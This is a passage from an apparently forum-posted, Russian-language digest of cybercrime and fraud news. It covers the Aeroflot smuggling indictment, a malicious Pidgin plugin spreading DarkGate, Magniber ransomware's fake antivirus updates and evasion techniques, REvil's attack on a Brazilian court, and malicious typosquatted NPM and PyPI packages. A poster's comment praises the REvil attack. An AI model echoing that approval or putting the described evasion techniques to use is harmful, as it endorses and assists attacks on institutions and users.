расследований. Это обвинительное заключение служит прямым сообщением о том,
что независимо от сложности преступной схемы преступления, совершаемые на
нашей границе, будут пресечены», - заявил директор CBP г-н Миллер.
«Сегодняшняя акция - результат выдающихся усилий и сотрудничества правоохранительных органов. Незаконная контрабанда товаров на коммерческих самолетах - серьезное нарушение законов об экспортном контроле и общественной безопасности, к которому мы относимся очень серьезно. Мы продолжим преследовать нарушителей, где бы они ни находились, по всему миру», - заявил специальный уполномоченный по коммерции г-н Карсон.
«Обвиняемые сегодня люди предположительно в полной мере воспользовались своим положением в авиакомпании, чтобы контрабандой переправить в Россию украденную электронику на сумму более $50 млн», - заявил специальный агент HSI г-н Фитцхью. «Именно благодаря продолжающемуся сотрудничеству между федеральными, государственными и местными правоохранительными органами мы можем положить конец подобным схемам, которые грабят миллионы американских предприятий и одновременно финансируют незаконные организации за рубежом, которые угрожают нашей национальной безопасности», - добавил он.
«Как утверждается, эти обвиняемые использовали коммерческие авиаперелеты для реализации своей схемы незаконной контрабанды - чрезвычайно опасное обстоятельство, которое было выявлено и обосновано в ходе расследования. Я благодарю наших преданных своему делу детективов полиции Нью-Йорка и всех наших партнеров из правоохранительных органов за их работу в этом деле», - заявил комиссар полиции Нью-Йорка г-н Ши.
Как указано в материалах дела правительства, ответчики предположительно участвовали в схеме по экспорту электронных устройств на сумму более $50 млн, включая устройства: Apple iPhone, iPad и Apple Watch, из Соединенных Штатов в Россию. Обвиняемые предположительно осуществляли эту схему путем контрабанды наличных денег и товаров через пассажиров авиакомпании, среди которых были нынешние и бывшие сотрудники авиакомпании «Аэрофлот». Получив инструкции от подсудимого Дайбагьи, жителя России, члены экипажа авиакомпании «Аэрофлот» и другие лица выехали в Соединенные Штаты, чтобы забрать электронные устройства. Подсудимые Асадов, Сохончук, Перевозников и Шадхин вместе с другими в Соединенных Штатах получали устройства, многие из которых были украдены, для отправки в Россию без необходимых разрешений на экспорт. В ходе расследования и обыска багажа, принадлежащего различным членам экипажей Аэрофлота и другим курьерам, были обнаружены электронные устройства на миллионы долларов США. Периодически подсудимые Дайбагья и Саидов сами провозили устройства контрабандой. Например, в период с августа 2019 года по декабрь 2019 года Дайбагья совершил четыре поездки из США, перевезя более 1000 продуктов Apple на сумму более $1 млн, а 5 октября 2019 года Саидов перевозил девять чемоданов с 235 продуктами Apple оценочной стоимостью около $250 тыс.
В ордерах на обыск, оформленных во время ареста обвиняемых, было обнаружено более $600 тыс. наличными, в том числе некоторые из них, спрятанные в подвале дома Шадхина, а также большое количество электронных устройств.
Обвинения в обвинительном заключении и жалобе являются утверждениями, и обвиняемые считаются невиновными до тех пор, пока их вина не будет доказана.
Данное дело находится в ведении Секции организованной преступности и банд. Обвинением руководят помощники прокурора США Кейт Д. Эдельман, Андрей Спектор и Дана Ренквист.
The Defendants:
E.D.N.Y. Docket No. 20-CR-415 (ARR)
AKMAL ASADOV
Age: 38
Brooklyn, New York
SAYUZ DAIBAGYA
Age: 46
Moscow, Russia
ANTON PEREVOZNIKOV
Age: 34
Brooklyn, New York
SHOHRUH SAIDOV
Age: 31
Brooklyn, New York
MARAT SHADKHIN
Age: 40
Brooklyn, New York
KIRILL SOKHONCHUK
Age: 37
Brooklyn, New York
E.D.N.Y. Docket No. 20-MJ-884 (LB)
AZAMAT BOBOMURODOV
Age: 31
Brooklyn, New York
ZOKIR ISKANDEROV
Age: 30
Brooklyn, New York
• Source: justice[.]gov/usao-edny/pr/ten-individuals-charged-50-million- russian-smuggling-scheme
• Source: justice[.]gov/usao-edny/press-release/file/1328511/download
• Source: justice[.]gov/usao-edny/press-release/file/1328516/download
Это, возможно, самый крупный штраф за попытку обойти государственную цензуру.
В северной части Китая программисту было выписано штрафное уведомление на сумму более 1 млн юаней за использование виртуальной частной сети (VPN). Это, возможно, самый крупный индивидуальный финансовый штраф за обход "Великого китайского файервола".
Программист по фамилии Ма получил уведомление от бюро общественной безопасности города Чэндэ, провинция Хэбэй, 18 августа. Согласно уведомлению, Ма использовал "несанкционированные каналы" для доступа к международным сетям в связи с работой в турецкой компании. Полиция конфисковала 1.058 млн юаней (более 14 млн рублей), заработанные Ма на посту разработчика программного обеспечения с сентября 2019 по ноябрь 2022 года, квалифицировав это как "незаконный доход".
Ма поделился на Weibo, что полиция впервые связалась с ним год назад, полагая, что он является владельцем аккаунта в Twitter, который находился в стадии расследования. Однако Ма отрицал свою причастность к данному аккаунту. Впоследствии его публикация была удалена, но сохранена в архиве China Digital Times.
После того как полиция выяснила, что Ма сотрудничает с зарубежной компанией, они конфисковали его телефон, ноутбук и несколько внешних дисков, удерживая их в течение месяца. Позднее Ма предоставил подробности о своей работе, банковские данные и прочую информацию, в результате чего ему был наложен штраф.
Чарли Смит (псевдоним), сооснователь сайта GreatFire.org, отслеживающего интернет-цензуру в Китае, отметил: "Даже если данное решение будет отменено судом, послание уже отправлено, а ущерб нанесен. Стоит ли теперь ожидать штрафов для бизнеса за пределами Китая?"
VPN-сервисы, которые предоставляют возможность обойти "Великий китайский файервол", находятся в юридической серой зоне в Китае. Тем не менее, за последние годы правительство ужесточило контроль над доступом к таким сервисам, и в некоторых случаях применяло санкции за их использование.
Обсуждая произошедший инцидент на платформе Zhihu, которую часто сравнивают с Reddit в Китае, один из пользователей выразил свою точку зрения: "Если начать выносить приговоры и налагать штрафы за подобные действия, это может нанести ущерб китайской IT-сфере". Позже этот комментарий был удален.
Данный инцидент породил дискуссии о том, нацелены ли власти на извлечение прибыли, вместо того чтобы бороться с преступностью. В удаленном посте на Weibo влиятельное лицо написало: "инцидент стал предметом насмешек на международной арене, и полиция в определенном месте стала синонимом грабителей".
source:
theguardian.com/world/2023/oct/09/chinese-programmer-ordered-to-pay-1m-yuan-
for-using-virtual-private-network
chinadigitaltimes.net/chinese/700552.html
Из официального репозитория плагинов Pidgin удалили плагин ScreenShareOTR. Дело в том, что он использовался для установки кейлоггеров, инфостилеров и других вредоносных программ, которые обычно применяются для получения первоначального доступа к корпоративным сетям.
Плагин рекламировался как решение для совместного использования экрана с помощью защищенного протокола Off-The-Record (OTR) и был доступен для версий Pidgin для Windows и Linux.
По данным аналитиков компании ESET, вредоносный плагин заражал системы ничего не подозревающих пользователей малварью DarkGate, которую злоумышленники применяют для взлома сетей с тех пор, как инфраструктура QBot была ликвидирована властями.
Исследователи объясняют, что у Pidgin существует система плагинов, позволяющая расширять функциональность программы, включать дополнительные функции и использовать расширенные настройки. Пользователи могут загружать плагины, используя официальный список сторонних решений, который в настоящее время насчитывает более 200 аддонов.
Согласно заявлению, опубликованному теперь на сайте проекта, вредоносный плагин ss-otr попал в упомянутый список 6 июля 2024 года и был удален оттуда только 16 августа, после сообщений о том, что он содержит кейлоггер и инструмент для захвата скриншотов.
«Плагин ss-otr был добавлен в список 6 июля. 16 августа мы получили сообщение от [пользователя] 0xFFFC0000 о том, что плагин содержит кейлоггер и передает снимки экрана посторонним лицам. Мы немедленно удалили плагин из списка и начали расследование. 22 августа [ИБ-специалист] Johnny Xmas помог подтвердить наличие кейлоггера», — пишут разработчики.
Click to expand...
Хотя автор ss-otr предоставил для загрузки только бинарники, а не исходный код, из-за отсутствия механизмов проверки в Pidgin никто не усомнился в его надежности.
По данным ESET, установщик плагина был подписан действительным цифровым сертификатом реальной польской компании INTERREX — SP.Z O.O и содержал вредоносный код, позволяющий загружать дополнительные бинарники с сервера злоумышленников (jabberplugins[.]net).
[](https://xakep.ru/wp- content/uploads/2024/08/481177/signed.jpg)
Полезная нагрузка представляла собой либо PowerShell-скрипты, либо упомянутую малварь DarkGate, которая также была подписана сертификатом Interrex.
По данным исследователей, на том же вредоносном сервере, который сейчас уже удален, размещались и другие плагины: OMEMO, Pidgin Paranoia, Master Password, Window Merge и HTTP File Upload. Специалисты уверены, что они почти наверняка тоже распространяли DarkGate, и ScreenShareOTR был лишь небольшой частью более масштабной кампании.
[](https://xakep.ru/wp-
content/uploads/2024/08/481177/site.jpg)
Сайт злоумышленников.
Всем, кто установил это плагин, рекомендуется немедленно удалить его и провести полное сканирование системы антивирусным инструментом, поскольку в система может быть заражена DarkGate.
Так как Pidgin не отслеживает, сколько раз был установлен тот или иной плагин, точное количество пострадавших неизвестно.
xakep.ru/2024/08/28/pidgin-screenshareotr
Британский предприниматель и основатель IT-компании Autonomy Майк Линч призвал американские власти отказаться от злоупотребления механизмом экстрадиции по делам о предполагаемых финансовых преступлениях, напомнив, что Вашингтон «не является глобальным маршалом корпоративного мира», сообщает агентство Bloomberg.
Об этом бизнесмен заявил в Вестминстерском магистратском суде в Лондоне на открытии процесса по делу о его экстрадиции в США.
Судье Майклу Сноу предстоит решить, возможна ли выдача Линча Соединенным Штатам, где он подозревается в многомиллиардном мошенничестве при продаже Autonomy американской корпорации Hewlett-Packard в 2011 году. По информации агентства, сумма сделки составила около 11 миллиардов долларов.
Процесс об экстрадиции привлек значительное внимание в том числе представителей юридического сообщества, некоторые из которых отмечают дисбаланс в пользу Соединенных Штатов в договоре об экстрадиции между странами, отмечет агентство.
Партнер юридической фирмы Corker Binning Эдвард Грейндж в интервью Financial Times отметил, что, если Линч добьется успеха в процессе об экстрадиции, это покажет, что британские суды «достаточно надежны, чтобы противостоять продолжающемуся чрезмерному охвату юрисдикции США».
Напомним, в 2012 году представители HP заявили, что предыдущее руководство Autonomy в ходе согласования сделки предоставило завышенные сведения о финансовых показателях компании с целью ввести в заблуждение потенциальных покупателей и инвесторов. По утверждению американской корпорации, из-за данного мошенничества спустя год после покупки ей пришлось списать часть активов Autonomy на 8,8 миллиарда долларов.
В 2015 году британское Бюро по борьбе с мошенничеством в особо крупных размерах (SFO) заявило о завершении собственного расследования сделки и передаче результатов правоохранительным органам США.
Сам британский предприниматель отрицает какие-либо нарушения со своей стороны.
При этом вместе с Линчем обвинения в мошенничестве были предъявлены бывшему финансовому директору Autonomy и гражданину Великобритании Сушовану Хуссаину. В 2019 году суд США признал его виновным по 16 пунктам обвинения и приговорил к 60 месяцам тюремного заключения и штрафу в размере 4 миллионов долларов.
Почта Канады (основной почтовый оператор в Канаде, обслуживающий более 16 500 000 жилых и служебных адресов) уведомила 44 коммерческих клиента о том, один из ее поставщиков стал жертвой атаки шифровальщика. В результате произошла утечка данных об адресах доставки.
Сообщается, что компрометации подверглась компания Commport Communications, и в итоге злоумышленники получили доступ к данным, хранящимся ее в системах. В руки хакеров попала информация из манифестов доставки крупных посылок для бизнес-клиентов, включая контактную информацию, имена, а также почтовые адреса отправителя и получателя.
В общей сложности в результате этой атаки пострадали 44 коммерческих клиента Почты Канады, а также более 950 000 клиентов-получателей. Подчеркивается, что финансовые данные раскрыты не были, и утечка охватывает период с июля 2016 по март 2019 года.
Для подавляющего большинства пострадавших (97%) были раскрыты только имя и адрес доставки. В остальных случаях (3%) могли быть скомпрометированы адрес электронной почты и номер телефона.
Издание Bleeping Computer пишет, что еще в конце 2020 года на сайте шифровальщика Lorenz были опубликованы данные о взломе Commport Communications. С тех пор хакеры обнародовали около 35,3 Гб данных, предположительно украденных во время атаки.

Хотя канадская почта заявляет, что во время атаки специалисты Commport Communications не знали, что к их данным получили доступ третьи лица, судя по информации на сайте Lorenz, это не совсем правда.
Источник: xakep.ru/2021/05/28/canada-post/
Новая кампания операторов программы-вымогателя Magniber нацелена на домашних пользователей Windows. Атакующие используют старый прием — фейковые обновления антивируса, подсовывая JavaScript-файлы.
В сентябре злоумышленники создали веб-сайты, на которых предлагались фейковые обновления антивирусов и других защитных средств для Windows 10. В результате пользователь мог загрузить ZIP-архивы, содержащие файлы JavaScript, которые запускали цепочку заражения шифровальщиком.
В [отчете](https://threatresearch.ext.hp.com/magniber-ransomware-switches-to- javascript-targeting-home-users-with-fake-software-updates/) исследователей из HP отмечается, что операторы Magniber требуют 2500 долларов за дешифратор, восстанавливающий файлы. Используемая версия вымогателя работает исключительно на Windows 10 и Windows 11. В последней кампании злоумышленники переключились с файлов формата MSI и EXE на JavaScript:
SYSTEM.Critical.Upgrade.Win10.0.ba45bd8ee89b1.js
SYSTEM.Security.Database.Upgrade.Win10.0.jse
Antivirus_Upgrade_Cloud.29229c7696d2d84.jse
ALERT.System.Software.Upgrade.392fdad9ebab262cc97f832c40e6ad2c.js
Эти обфусцированные файлы используют технику “DotNetToJScript” для выполнения .NET-файла в памяти системы. Такой подход снижает риски детектирования антивирусными продуктами. .NET-файл расшифровывает шелл-код, который использует собственную обертку для незаметной инъекции в новый процесс.
Все теневые копии, само собой, удаляются. Помимо этого, вредонос отключает функции создания резервных копий. Контроль учетных записей в Windows (UAC) также легко обходится, что позволяет вымогателю спокойно выполнять свои функции в системе.
Изначально авторы Magniber задумывали шифрование лишь отдельных типов файлов, но из-за несовершенной генерации псевдохеша вредонос шифрует и другие типы файлов.
Арестован последний участник группы хакеров, взломавших в 2020 году аккаунты известных персон в Твиттере. Мошенничество принесло группе хакеров более $100 000 в BTC.
Джозеф О'Коннор (Joseph O’Connor), 22-летний гражданин Великобритании, известный под ником PlugWalkJoe, был вчера арестован в Испании за его причастность к взлому Twitter в 2020 году. О'Коннор скомпрометировал аккаунты бывшего президента США Барака Обамы и Илона Маска и исчез с более чем $100 000 в BTC.
О'Коннор был участником группы хакеров, которые размещали на взломанных страницах Твиттера сообщение об удвоении любого платежа в биткоинах, отправленного на указанный ими криптовалютный кошелек.
В июле 2020 года О'Коннор давал интервью The New York Times и был довольно оптимистичен в отношении возможного задержания:
«Они могут прийти и арестовать меня. Я бы посмеялся над ними. Я ничего не сделал», - сказал он в интервью Times.
Арест Джозефа О'Коннора – завершающий этап расследования последствий взлома Твиттера. Ранее были арестованы остальные участники хакерской группы: Грэм Айвен Кларк (Graham Ivan Clark), Нима «Rolex» Фазели (Nima “Rolex” Fazeli) и Мэйсон «Чэвон» Шеппард (Mason “Chaewon” Sheppard).
Помимо этого, Окружной суд США в Северном округе штата Калифорния заявил, что О'Коннор причастен к компрометации аккаунтов TikTok и Snapchat. На данный момент роль подозреваемого во взломе сети Twitter остается не до конца ясной, однако правоохранительные органы предъявили ему следующие обвинения:
Три эпизода несанкционированного доступа и сбора конфиденциальной информации на защищённом компьютере;
Два эпизода преднамеренного доступа к компьютеру без авторизации, а также кражи важных данных;
Один эпизод кражи у некоего лица ценной вещи;
Один эпизод вымогательства у неизвестной жертвы, а также угроз в её адрес;
Два эпизода киберсталкинга.
Экс-адвокат из американского штата Южная Каролина Ричард Мердо (Richard Murdaugh) признал себя виновным в совершении 22 финансовых преступлений, большая часть из которых связана с банковским и электронным мошенничеством, а также отмыванием грязных денег. Агентство [Reuters передает из зала суда](https://www.reuters.com/legal/disgraced-former-south-carolina-lawyer- murdaugh-pleads-guilty-bank-fraud-2023-09-21/), что 54-летний американец согласился возместить нанесенный его действиями ущерб в девять миллионов долларов.
Стоит отметить, что в сейчас Мердо уже отбывает два пожизненных срока без права на помилование за двойное убийство. В июне 2021 года он жестоко расстрелял свою 52-летнюю жену Мэгги и 22-летнего сына Пола, выпустив в каждого по обойме из разных оружий. Суд над адвокатом в самой Южной Каролине окрестили «процессом столетия». Тем не менее сам Мердо виновным себя так и не признал.
По мнению прокуратуры, на убийство близких американца толкнул страх, что они могут узнать о его финансовых махинациях. Большие деньги были нужны кардеру для поддержания шикарного образа жизни, а также из-за наркозависимости: многие годы теперь уже бывший адвокат употреблял героин.
Приговор Мердо суд вынесет позднее. Ему грозит не менее 20 лет заключения за финансовые преступления, однако, само собой, этот приговор будет объединен с уже имеющимся и принципиально на судьбу кардера не повлияет.
Richard Alexander Murdaugh
Бразильский Tribunal de Justiça do Estado do Rio Grande do Sul - ( Суд штата Риу-Гранди-ду-Сул (TJRS) ) - вчера подвергся атаке программы-вымогателя REvil, которая зашифровала файлы сотрудников и вынудила суд закрыть их сеть.Атака началась вчера утром, когда сотрудники внезапно обнаружили, что все их документы больше не доступны, а на их рабочем столе появилась записка о выкупе. Вскоре после начала атаки официальный аккаунт TJRS в Twitter сообщил, чтобы сотрудники не входили в системы сети TJ не локально , не через RDP. Эта атака - не первая атака адвертов ПП на судебные системы в Бразилии. REVil потребовали выкуп в размере 5 000 000 долларов за расшифровку файлов.
(скрин выложеный работниками суда)

PS - Красава, парни. xD well done)
Решение для поиска запрещенного контента в Telegram разработала российская
компания "Спрут-Информ" - оно позволяет искать противоправный контент и
предупреждать попытки вербовок россиян для совершения диверсий, рассказал РИА
Новости сооснователь компании и эксперт рынка эксперт рынка НТИ SafeNet
(Сейфнет) Игорь Бедеров.
"Российская компания "Спрут-Информ" разработала решение для мониторинга
Telegram, которое позволяет искать противоправный контент и предупреждать
попытки вербовок россиян для совершения диверсий", - сказал Бедеров.
Он объяснил, что система "Спрут-Тел" позволяет осуществлять мониторинг Telegram для выявления ключевых слов по списку заказчика, находить в мессенджере экстремистский и деструктивный контент и его авторов. Она формирует список источников, по которым будет осуществляться поиск. Затем происходит наполнение базы текстовыми данными из каналов, публичных чатов и комментариев и их последующая аналитическая обработка под задачу заказчика.
"Спрут-Тел" также способен устанавливать аккаунты в Telegram, которые оставляли под постом те или иные реакции. Разработчики планируют добавить анализ высказываний в группах и эмодзи, поставленных конкретным пользователем Telegram. Также тестируется функция поведенческого анализа пользователей для вычисления ботов.
"Приватные каналы и группы с деструктивным контентом появляются ежедневно. Также сейчас участились случаи, когда несовершеннолетних вербуют через соцсети и мессенджеры, в том числе Telegram. В обмен на денежное вознаграждение их просят совершать незаконные действия, например, поджечь трансформаторную подстанцию или вышку сотовой связи. Правоохранительным органам нужны специальные инструменты для мониторинга соцсетей и мессенджеров, которые позволят оперативно осуществлять проверку контента и в перспективе снизить плотность запрещенного контента в интернете", - прокомментировал Бедеров.
Click to expand...
В компании Visa существует отдельный департамент разведки, который собирает данные о действиях и тактиках кардеров, в том числе на закрытых теневых площадках и в Telegram-каналах. Об этом в интервью порталу Benzinga рассказал глава отдела по борьбе с мошенничеством Visa в статусе вице-президента Майкл Джаббара (Michael Jabbara).
«В компании реализованы несколько слоев безопасности, возведенные, чтобы защитить любой элемент и любого участника нашей экосистемы. При этом мы знаем, что не существует какой-то единой стратегии, которая помогла бы защищать пользователей от мошенников и кардеров, которые очень изобретательны и настойчивы. Поэтому у нас есть несколько защитных тактик, одна из которых — анализ теневых площадок», — сказал Джаббара.
В частности, он рассказал, что в Visa пристально наблюдают за тем, как развиваются различные семейства вредоносных программ и программ-вымогателей, кто их использует и как их внедряют в конкретные организации финансовой отрасли.
«Мы смотрим на типы данных, которые продаются в даркнете, персональные данные, номера карт и отслеживаем основные тенденции. Например, есть ли какой-то конкретный банк, который внезапно вырывается в лидеры по числу проданных на теневых ресурсах карточек? Почему это происходит? Мы проводим расследования по итогам всех подобных исследований», — объяснил Джаббара.
Он добавил, что департамент разведки изучает любую серьезную утечку данных, которая происходит в любой точке мира. Специалисты анализируют образцы кода, использованного в этих атаках, интегрируют их в свою библиотеку, а затем сканируют. Кроме того, Visa уделяет особое внимание конкретным семействам вредоносных программ, нацеленных на криптопродавцов и биржи.
source: benzinga.com/23/04/31805568/exclusive-interview-with-visa-fraud-chief- fraudsters-are-actively-trying-to-grab-the-pot-of-money-th
В Москве экс-прокурор Манеркин продал машину и отдал аферистам все накопления
В Москве экс-начальник управления по надзору за соблюдением федерального
законодательства прокуратуры города 69-летний Евгений Манеркин продал
автомобиль марки Audi Q7 и отдал мошенникам вырученные за него деньги и все
накопления в размере 20 миллионов рублей. Об этом сообщает Baza в своем
Telegram-канале.
По информации канала, аферисты стали звонить экс-прокурору с 13 июня. Они
представлялись сотрудниками Роскомнадзора, Росфинмониторинга и Мосэнерго и
запугивали его, рассказывая, что его накопительные счета находятся под угрозой
и что все деньги нужно срочно перевести на якобы безопасный счет. Затем
злоумышленники убедили Манеркина продать его машину, а вырученные деньги также
перечислить на этот счет. Таким образом, в течение 10 дней экс-прокурор
перевел мошенникам 20 миллионов рублей.
Инвесторы в UST и Luna потеряли примерно 42 миллиарда долларов.
Суд Южной Кореи выдал ордер на арест До Квона, основателя блокчейн-платформы Terraform Labs и основного разработчика криптовалют Luna и TerraUSD, чей крах в мае потряс криптовалютные рынки по всему миру.
"Ордер на арест выдан в общей сложности на шесть человек, включая Do Kwon , которые в настоящее время проживают в Сингапуре", - заявил в среду представитель прокуратуры.
Прокуратура считает, что Terraform Labs, зарегистрированная в Сингапуре, нарушила правила рынка капитала. Приказ об аресте был выдан после нескольких месяцев расследования, включая обыски и изъятия документов офисах компании и на местных криптовалютных биржах.
В мае этого года поддерживаемый экосистемой Terraform Labs стейблкоин TerraUSD (UST), входивший в топ-10 крупнейших криптовалют мира по рыночной стоимости, после разовой продажи на сумму около $300 млн нарушил привязку к доллару США, упал в цене почти до нуля и обрушил курс токена Luna.
Последовавшие за этим потрясения на рынке привели к банкротству нескольких крупных криптокомпаний, в том числе американского криптокредитора Celsius и одного из крупнейших в мире криптовалютных хедж-фондов Three Arrows Capital.
По данным аналитической компании Elliptic, инвесторы в UST и Luna потеряли примерно 42 миллиарда долларов.
В видеоинтервью криптовалютной медиаплатформе Coinage в августе Квон сказал, что переехал в Сингапур из-за опасений за безопасность своей семьи, и отверг предположения, что переезд был связан с аварией или попыткой скрыться от следователей.
source: bloomberg.com/news/articles/2022-09-14/south-korea-seeks-the-arrest- of-terraform-labs-founder-do-kwon

](https://www.theverge.com/2024/4/30/24140638/binance-founder-changpeng-zhao- sentence-money-laundering)
Zhao, who began the run on FTX that eventually revealed fraud at the exchange, pleaded guilty to breaking laws himself.
www.theverge.com
upd приговорен сорри за кликбейт
Эксперты компании Intezer [сообщают](https://www.intezer.com/resource/year-of- the-gopher-2020-go-malware-round-up/), что с 2017 года количество вредоносных программ, написанных на языке Go, увеличилось на 2000%, и в настоящее время такая малварь уже стала обычным явлением. Golang часто используют «правительственные» хакеры, злоумышленники более низкого уровня, а также специалисты по информационной безопасности (обычно для создания пентестерских инструментов).
Ранее специалисты уже [отмечали](https://unit42.paloaltonetworks.com/the- gopher-in-the-room-analysis-of-golang-malware-in-the-wild/), что в последние годы злоумышленники постепенно отошли от использования C и C ++, все чаще отдавая предпочтение Go, языку программирования, разработанному и запущенному Google в 2007 году. Хотя первый вредонос на Go появился еще в 2012 году, языку потребовалось время, чтобы завоевать такую популярность.
В своем отчете Intezer объясняет, что у этой популярности есть три основных причины. Первая из них, это простота кроссплатформенной компиляции, позволяющая разработчикам малвари один раз написать код, а затем сразу компилировать бинарники для разных платформ, включая Windows, Mac и Linux.
Вторая причина заключается в том, что бинарники на основе Go по-прежнему весьма сложно анализировать и реверсить, что позволяет хакерам поддерживать низкие уровни обнаружения для своей малвари.
Третья причина связана с тем, как в Go реализована поддержка работы с сетевыми пакетами и запросами:
«Go имеет хорошо написанный сетевой стек, с которым легко работать. Go стал одним из облачных языков программирования, на котором написано множество нативных облачных приложений. Например, Docker, Kubernetes, InfluxDB, Traefik, Terraform, CockroachDB, Prometheus и Consul — все они написаны на Go. Это имеет смысл, учитывая, что одной из причин создания Go было изобретение лучшего языка, который можно было бы использовать для замены внутренних сетевых служб C ++, используемых Google», — говорят исследователи.
Click to expand...
Многие из написанных на Go вредоносов – это ботнеты, нацеленные на IoT- устройства и Linux, целью которых является либо установка криптовалютных майнеров, либо использование зараженных устройств для DDoS-атак. Кроме того, эксперты пишут, что все больше становится вымогателей, тоже написанных на языке Go.
В 2020 году Go-угроз было много, исследователи перечисляют лишь наиболее распространенные и заметные из них:
За атакой предположительно стоят участники хактивистского движения Anonymous,
добивающиеся прекращения конфликта в Украине.
Немецкая дочерняя компания российского нефтяного гиганта «Роснефть»
подверглась кибератаке и теперь пытается справиться с ее последствиями. Как
сообщает немецкое издание Welt, Rosneft Deutschland была предположительно
атакована в ночь с 11 на 12 марта.
Хакеры утверждают, что уничтожили несколько десятков устройств Apple, глубоко проникли в административные системы компании и получили копии образов дисков ноутбуков сотрудников.
Федеральное управление по информационной безопасности Германии (BSI) предложило компании свою помощь в восстановлении систем и опубликовало предупреждение для других представителей энергетического сектора.
BSI подозревает, что за атакой стоят участники хактивистского движения Anonymous, добивающиеся прекращения конфликта в Украине. Судя по всему, Anonymous уже атаковали и парализовали международный сайт «Роснефти» еще в конце февраля. Несколько дней назад также сообщалось, что группировка получила доступ к серверам немецкой «дочки» российской госкомпании и похитила ее данные.
Атака не повлияла на текущий бизнес или поставки, но системы были значительно затронуты. В частности, были нарушены различные процессы, в том числе возможность заключения договоров.
Хакеры утверждают , им удалось получить доступ к серверам Rosneft Germany и скачать более 20 Тб данных. При этом они очень глубоко проникли в системы Rosneft Deutschland. Настолько глубоко, что они легко нашли резервные копии ноутбуков сотрудников и руководителей.
Люди, стоящие за взломом, утверждают, что не собираются раскрывать все данные. Основными целями являются политики и лоббистские группы, а также их действия за закрытыми дверями.
Центральное место в немецком нефтяном бизнесе занимает нефтепровод «Дружба», по которому нефть доставляется из России в немецкий город Шведт через Польшу. Сама «Роснефть» является крупнейшим производителем нефти в России. Экс-канцлер Германии Герхард Шредер занимает пост главы наблюдательного совета компании.
[Зафиксирована атака](https://checkmarx.com/blog/how-npm-packages-were-used- to-spread-phishing-links/) на пользователей каталога NPM, в результате которой 20 февраля в репозитории NPM было размещено более в 15 тысяч пакетов, в README-файлах которых присутствовали ссылки на фишинговые сайты или реферальные ссылки, за переходы по которым выплачиваются отчисления. В ходе анализа в пакетах было выявлено 190 уникальных фишинговых или рекламных ссылок, охватывающих 31 домен.
Имена пакетов выбирались для привлечения интереса обывателей, напирмер, "free- tiktok-followers" "free-xbox-codes", "instagram-followers-free" и т.п. Расчёт делался на заполнение спамерскими пакетами списка недавних обновлений на главной странице NPM. В описании к пакетам приводились ссылки, обещавшие бесплатные раздачи, подарки, игровые читы, а также бесплатные услуги по накручиванию подписчиков и лайков в социальных сетях, таких как TikTok и Instagram. Это не первая подобная атака, в декабре в каталогах NuGet, NPM и PyPi была [зафиксирована](https://medium.com/checkmarx-security/illustria- checkmarx-finds-140k-phishing-packages-6813c27d10ac) публикация 144 тысяч спамерских пакетов.
Содержимое пакетов было сгенерировано автоматически с использованием python- скрипта, который видимо по недосмотру был оставлен в пакетах и включал в себе рабочие учётные данные, использованные в ходе атаки. Пакеты были опубликованы под множеством различных учётных записей с использованием методов, усложняющих распутывание следов и оперативную идентификацию проблемных пакетов.
Кроме мошеннических действий в репозиториях NPM и PyPi также выявлено несколько попыток публикации вредоносных пакетов:
• В репозитории PyPI [найден 451](https://blog.phylum.io/phylum-discovers- revived-crypto-wallet-address-replacement-attack) вредоносный пакет, который маскировался под некоторые популярные библиотеки при помощи тайпсквотинга (назначение похожих имён, отличающихся отдельными символами, например, vper вместо vyper, bitcoinnlib вместо bitcoinlib, ccryptofeed вместо cryptofeed, ccxtt вместо ccxt, cryptocommpare вместо cryptocompare, seleium вместо selenium, pinstaller вместо pyinstaller и т.п.). Пакеты включали обфусцированный код для кражи криптовалюты, который определял наличие идентификаторов криптокошельков в буфере обмена и менял их на кошелёк злоумышленника (предполагается, что при совершении оплаты жертва не заметит, что перенесённый через буфер обмена номер кошелька отличается). Подмену осуществляло встраиваемое в браузер дополнение, которое выполнялось в контексте каждой просматриваемой web-страницы.
• В репозитории PyPI [выявлена](https://www.reversinglabs.com/blog/beware- impostor-http-libraries-lurk-on-pypi) серия вредоносных HTTP-библиотек. Вредоносная активность была найдена в [41 пакете](https://www.reversinglabs.com/blog/beware-impostor-http-libraries- lurk-on-pypi#package-list), имена которых выбирались с использованием методов тайпсквоттинга и напоминали популярные библиотеки (aio5, requestst, ulrlib, urllb, libhttps, piphttps, httpxv2 и т.п.). Начинка была стилизована под работающие HTTP-библиотеки или копировала код существующих библиотек, а в описании приводились утверждения о преимуществах и сравнения с легитимными HTTP-библиотеками. Вредоносная активность сводилась либо к загрузке вредоносного ПО на систему, либо к сбору и отправке конфиденциальных данных.
• В NPM [выявлено 16](https://blog.checkpoint.com/2023/02/14/check-point- cloudguard-spectral-detects-malicious-crypto-mining-packages-on-npm-the- leading-registry-for-javascript-open-source-packages/) JavaScript-пакетов (speedte*, trova*, lagra), которые помимо заявленной функциональности (тестирование пропускной способности) также содержали код для майнинга криптовалюты без ведома пользователя.
• В NPM выявлен 691 вредоносный пакет. Большая часть проблемных пакетов притворялась проектами Yandex (yandex-logger-sentry, yandex-logger-qloud, yandex-sendsms и т.п.) и включала код для отправки конфиденциальной информации на внешние серверы. Предполагается, разместившие пакеты пытались добиться подстановки собственной зависимости при сборке проектов в Yandex (метод подмены внутренних зависимостей). В репозитории PyPI теми же исследователями найдено 49 пакетов (reqsystem, httpxfaster, aio6, gorilla2, httpsos, pohttp и т.п.) с обфусцированным вредоносным кодом, загружающим и запускающим исполняемый файл с внешнего сервера.
ИТ-специалисту, скрывающемуся под псевдонимом Throwaway59724, удалось почти полностью автоматизировать свои рабочие обязанности и тратить на их выполнение всего 10 минут в день. При этом ему (или ей, пол Throwaway59724 неизвестен) даже не приходится выходить из дома.
Помог ему в этом простейший скрипт, написанный им за очень короткое время и полностью взявший на себя все его обязанности. О своем достижении он рассказал на Reddit. Пост, опубликованный 13 января 2022 г., привлек колоссальное внимание и за неполные два дня набрал свыше 80 тыс. положительных оценок и более 5000 комментариев.
При этом Throwaway59724 не нарушил никаких законов и даже не пошел на обман руководителя. Он честно выполняет свою работу в полном объеме, с той лишь разницей, что теперь все за него делает его компьютер.
Таким образом, применив базовые знания программирования, полученные за пару минут поиска в Google, он смог почти полностью освободить свое время от работы и тратить его на то, что хочется ему, а то, что требует от него компания. Зарплату он тоже получает. Это около $90 тыс. в год (6,71 млн руб. по курсу ЦБ на 14 января 2022 г.).
Гениальное решение, не требующее усилий
